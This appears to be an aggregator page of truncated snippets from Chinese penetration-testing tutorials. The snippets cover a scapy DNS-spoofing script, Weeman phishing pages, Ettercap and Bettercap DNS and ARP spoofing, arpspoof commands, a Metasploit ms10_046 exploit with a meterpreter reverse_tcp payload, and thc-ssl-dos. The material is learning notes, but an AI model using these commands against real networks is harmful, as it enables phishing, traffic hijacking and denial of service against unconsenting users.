'''' from scapy.all import * from threading import Thread def DNShijacking(): global wg wg=raw_input('Please enter your IP:') print '[+]dns spoof!' nwdf=dns_spoof(joker='{}'.format(wg),match={None:None}) print nwdf.show() DNShijacking() def make_repl…

下午无聊再网上闲逛随意看了下,自己做了一次测试,目前最新的版本是1.6.Weeman是一款运行在Python环境下的钓鱼渗透测试工具 但这款工具简单易用,安装简单,可伪造HTML页面等等...网上看了下,国内这个工具教程很少,要么教程都是重复的,而且也不是很详细. 所以自己摸索了几个小时,把大致的使用过程发布出来和大家分享一下.说的不好地方请大家见谅. 工具项目地址:https://github.com/Hypsurus/weeman/ 克隆地址:https://github.com/Hypsu…

钓鱼+DNS欺骗学习笔记 0x00 写在前面 原文链接: http://www.cnblogs.com/hkleak/p/5186523.html 感谢大佬无私教学 0x01 步骤如下 第一步:布置钓鱼页面 提示:weenman在windows无法配置运行 git clone https://github.com/samyoyo/weeman.git 进入文件夹 python weeman.py (weeman ) : help show : show default settings. set…

转自:http://www.cnblogs.com/hkleak/p/5043063.html 笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的. 而ettercap是在linux下运行的 .其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等.总之这是一款强大的安全测试工具. 笔记二:DNS简单说明 了解DNS是什么:Domain Na…

Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗.嗅探.dns欺骗.session劫持 文/玄魂 目录 Kali Linux Web 渗透测试—第十四课-arp欺骗.嗅探.dns欺骗.session劫持      1 关于嗅探.arp欺骗.会话劫持.............................................................. 1 视频教程地址:http://edu.51cto.com/course/course_id-1887.h…

ms10_046_shortcut_icon_dllloader漏洞利用过程 msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_046_shortcut_icon_dllloader) >…

目的 让内网的所有计算机浏览网页的时候, 出现我的钓鱼页面 准备 kali系统 Bettercap dns文件 通过ifconfig查看当前计算机的ip, 我这边为, 192.168.1.150 创建一个 dns.conf 文件,下面这个dns语句的意思是:所有的.com结尾的网站全部解析到我的本地Http服务器, .*\.com就是一个正则,也可以是自定义的正则 192.168.1.150 .*\.com 本地搭建Http服务器 使用nodeJS搭建一个简单的服务器, 用apache或者其它工…

一.Ettercap 使用教程 EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具.它具有动态连接嗅探.动态内容过滤和许多其他有趣的技巧.它支持对许多协议的主动和被动分析,并包含许多用于网络和主机分析的特性.主要适用于交换局域网络,借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输. 实验环境:Kali Linux2018.2 1. 由于我用的是kali linux 2018.2 版本,已经内置了…

准备:kali.xp kali ip:192.168.14.157 目标ip:192.168.14.158 目标网关:192.168.14.2 ARP欺骗:arpspoof -t 目标ip -r 目标网关 命令:arpspoof  -i  eth0 -t 192.168.14.158 -r 192.168.14.2 我们可以看到xp认为网关的MAC地址和KAli是一样的 显示我们欺骗成功 但现在xp是不能上网的 kali 默认不会开启流量转发 我们在xp下是不能上网的 打开流量转发的功能: 查看…

一. thc-ssl-dos 1.简介 (1).SSL 协商加密对性能开销增加,大量握手请求会导致 DOS (2).利用 SSL secure Renegotiation 特性,在单一 TCP 连接中生成数千个 SSL 重连接请求,造成服务器资源过载 (3).与流量式拒绝访问攻击不同,thc-ssl-dos 可以利用 dsl 线路打垮 30G 带宽的服务器 (4).服务器平均可以处理 300 次/秒 SSL 握手请求 (5).对 SMTPS.POP3S 等服务同样有效 2.用法 root@kal…